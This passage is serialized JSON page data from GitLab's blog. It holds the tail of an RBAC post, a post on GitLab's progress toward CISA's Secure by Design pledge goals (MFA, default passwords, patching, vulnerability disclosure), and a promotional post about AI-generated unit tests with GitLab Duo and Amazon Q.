This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.\n\n## Why GitLab?\n\nGitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams. \n\nIntegrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.\n\n## Summary\nRBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.\n\n> Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. 
[Sign up today](https://about.gitlab.com/free-trial/)!",[767],[1146,1147,1148],"James Wormwell","Paul Meresanu","Kees Valkhof",{"featured":91,"template":789,"slug":1150},"automating-role-based-access-control-rbac-at-scale",{"content":1152,"config":1161},{"title":1153,"description":1154,"authors":1155,"heroImage":1157,"date":1158,"body":1159,"category":767,"tags":1160},"Last year we signed the Secure by Design pledge - here's our progress","Learn about GitLab's CISA-aligned additions and improvements around MFA, default password reduction, patching, and vulnerability disclosure.",[1156],"Joseph Longo","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659684/Blog/Hero%20Images/AdobeStock_479904468__1_.jpg","2025-06-09","A little over a year ago, GitLab signed [CISA’s Secure by Design Pledge](https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/), a directive for technology providers to embed security at the heart of their products from the outset of development. Since then, we've made significant progress towards improving our security posture and creating a more secure ecosystem for our customers to develop secure software faster.\n\n## Meeting the security goals\n\nLet’s explore the additions and improvements we've made to further enhance security across the development lifecycle.\n\n### Multi-factor authentication (MFA)\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.***\n\nGitLab currently offers multiple [MFA](https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html) options for users to secure their accounts. 
We also offer SSO functionality to enable [GitLab.com](https://docs.gitlab.com/ee/user/group/saml_sso/), [Self-Managed](https://docs.gitlab.com/integration/saml/), and [GitLab Dedicated](https://docs.gitlab.com/integration/saml/) customers to streamline their authentication processes and their internal MFA requirements.\n\nTo further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.\n\nIn the coming months, we will deploy changes requiring all customers to enable MFA on their accounts. \n\nFor customers who already have MFA enabled or authenticate to GitLab via their organization’s single sign-on (SSO) method, there will be no necessary changes. For customers who do not already have MFA enabled and are not authenticating to GitLab via their organization’s SSO method, they will be required to enable MFA and enroll in one or more of the available MFA methods.\n\nThe MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be shared in the near future.\n\n### Default passwords\n\n***Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.***\n\nTo reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. 
GitLab’s multi-method [installation instructions](https://docs.gitlab.com/ee/install/install_methods.html) also include guidance on how to change the randomly generated root password for each installation.\n\nFor some install methods, such as installing GitLab in a Docker container, the password file with the initial root password is deleted in the first container restart after 24 hours to help further harden the GitLab instance.\n\n### Reducing entire classes of vulnerabilities\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.***\n\nGitLab has published [secure coding guidelines](https://docs.gitlab.com/ee/development/secure_coding_guidelines.html#sast-coverage) to its documentation site that contains descriptions and guidelines for addressing security vulnerabilities commonly identified in the GitLab codebase. \n\nThe guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.” \n\nGitLab continues to improve its [SAST rule coverage](https://docs.gitlab.com/development/secure_coding_guidelines#sast-coverage) to address broader sets of security vulnerabilities for itself and its customers.\n\n### Security patches\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.***\n\nGitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. 
Additionally, GitLab publishes a [maintenance policy](https://docs.gitlab.com/ee/policy/maintenance.html), which outlines its approach to releasing updates, backporting, upgrade recommendations and supporting documentation, etc.\n\nGitLab’s documentation has comprehensive guidance on [how to upgrade](https://docs.gitlab.com/ee/update/?tab=Self-compiled+%28source%29#upgrade-based-on-installation-method) self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.\n\nGitLab also provides a detailed [upgrade plan](https://docs.gitlab.com/ee/update/plan_your_upgrade.html) to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.\n\nDepending on the version upgrade, specific changes ([example for GitLab 17](https://docs.gitlab.com/ee/update/versions/gitlab_17_changes.html)) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.\n\n### Vulnerability disclosure policy\n\n***Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).***\n\nGitLab maintains a strong bug bounty program through [HackerOne](https://hackerone.com/gitlab?type=team), a [security.txt](https://gitlab.com/.well-known/security.txt) file highlighting GitLab’s preferred and additional disclosure processes, and [release posts](https://about.gitlab.com/releases/categories/releases/) highlighting security fixes.\n\nCustomers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.\n\n### Common vulnerability enumerations \n\n***Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting***\n\nGitLab includes the Common Weakness Enumeration (CWE) field in all Common vulnerability enumerations (CVE) records it publishes. 
Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.\n\nThe GitLab [CVE assignments project](https://gitlab.com/gitlab-org/cves) stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.\n\n> Check out [GitLab’s CVE submission template](https://gitlab.com/gitlab-org/cves/-/blob/master/.gitlab/issue_templates/Internal%20GitLab%20Submission.md?ref_type=heads).\n\n### Evidence of intrusions\n\n***Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.***\n\nGitLab has published an [incident response guide](https://docs.gitlab.com/ee/security/responding_to_security_incidents.html) to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its [GUARD detection-as-code](https://about.gitlab.com/blog/unveiling-the-guard-framework-to-automate-security-detections-at-gitlab/) and TLDR threat detection frameworks. 
The repositories for those open source frameworks can be found on [GitLab’s Open Source Security Center](https://about.gitlab.com/security/open-source-resources/).\n\nIn a similar manner, GitLab is adding functionality to its [GitLab.com](http://gitLab.com) service offering to [detect compromised passwords](https://about.gitlab.com/blog/introducing-compromised-password-detection-for-gitlab-com/) for all logins using GitLab’s native username and password authentication method.\n\n## What's next\n\n[GitLab’s Security Division’s mission](https://gitlab.com/gitlab-com/gl-security) is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.\n\nGitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on. \n\nOur commitment to iteration means we're already focused on the next set of innovations that will drive us forward.\n\n> To learn more about GitLab’s security enhancements, bookmark our [security page on the GitLab Blog](https://about.gitlab.com/blog/categories/security/).\n\n## Read more  \n- [Secure by Design principles meet DevSecOps innovation in GitLab 17](https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/)\n- [Happy birthday, Secure by Design!](https://about.gitlab.com/blog/happy-birthday-secure-by-design/)\n- [Strengthen your cybersecurity strategy with Secure by 
Design](https://about.gitlab.com/the-source/security/strengthen-your-cybersecurity-strategy-with-secure-by-design/)",[709,475,767,184],{"slug":1162,"featured":91,"template":789},"last-year-we-signed-the-secure-by-design-pledge-heres-our-progress",{"content":1164,"config":1167},{"title":817,"description":818,"authors":1165,"heroImage":821,"body":822,"date":823,"category":679,"tags":1166},[820],[675,767],{"featured":91,"template":789,"slug":826},[1169,1174,1179],{"content":1170,"config":1173},{"title":855,"description":856,"authors":1171,"heroImage":859,"date":860,"body":861,"category":691,"tags":1172},[858],[757],{"featured":6,"template":789,"slug":864},{"content":1175,"config":1178},{"title":1088,"description":1089,"authors":1176,"heroImage":1092,"date":1093,"body":1094,"category":757,"tags":1177},[1091],[1096],{"featured":6,"template":789,"externalUrl":1098,"slug":1099},{"config":1180,"content":1181},{"slug":829,"featured":91,"template":789},{"title":831,"description":832,"authors":1182,"heroImage":835,"date":836,"category":679,"tags":1183,"body":838},[834],[679,786,757,767],[1185,1190,1204],{"content":1186,"config":1189},{"title":841,"description":842,"authors":1187,"heroImage":845,"date":836,"body":846,"category":679,"tags":1188},[844],[675,848,786],{"featured":6,"template":789,"slug":850},{"content":1191,"config":1202},{"title":1192,"description":1193,"authors":1194,"heroImage":1196,"date":1197,"body":1198,"category":679,"tags":1199},"Enhance application quality with AI-powered test generation","Learn how GitLab Duo with Amazon Q improves the QA process by automatically generating comprehensive unit tests.",[1195],"Cesar Saavedra","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659604/Blog/Hero%20Images/Screenshot_2024-11-27_at_4.55.28_PM.png","2025-07-03","You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. 
You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.\n\nHere's where [GitLab Duo with Amazon Q ](https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/), which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.\n\n## How GitLab Duo with Amazon Q works\n\nSo how does this work? Let's walk through the process together.\nWhen you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the \"Changes\" tab to see the new code you've added.\n\nNext, you invoke Amazon Q by entering a quick action command. All you need to do is type `/q test` in the issue comment box. It's that simple – just a forward slash, the letter \"q\", and the word \"test\".\n\nOnce you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.\n\nWithin moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. 
The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.\n\n## Why use GitLab Duo with Amazon Q?\n\nHere's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.\n\nKey benefits of this feature:\n\n* Significantly reduces time spent writing unit tests\n* Ensures comprehensive test coverage across your codebase\n* Maintains consistent testing quality across all team members\n* Catches issues before they reach production\n* Accelerates your overall development velocity\n\nReady to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:\n\n\u003C!-- blank line -->\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line --> \n\n## Get started with GitLab Duo with Amazon Q today\n\nWant to learn more about GitLab Duo with Amazon Q? 
Visit the [GitLab and AWS partner page](https://about.gitlab.com/partners/technology-partners/aws/) for detailed information.\n\n## Agentic AI resources\n- [Agentic AI guides and resources](https://about.gitlab.com/blog/agentic-ai-guides-and-resources/)\n- [What is agentic AI?](https://about.gitlab.com/topics/agentic-ai/)\n- [GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available](https://about.gitlab.com/blog/2025/04/17/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/)\n- [GitLab Duo with Amazon Q documentation](https://docs.gitlab.com/user/duo_amazon_q/)",[675,757,1200,709,786,1201],"testing","AWS",{"featured":91,"template":789,"slug":1203},"enhance-application-quality-with-ai-powered-test-generation",{"content":1205,"config":1208},{"title":932,"description":933,"authors":1206,"heroImage":936,"date":937,"body":938,"category":713,"tags":1207},[935],[940,757,109,941],{"featured":6,"template":789,"slug":943},1752588144730]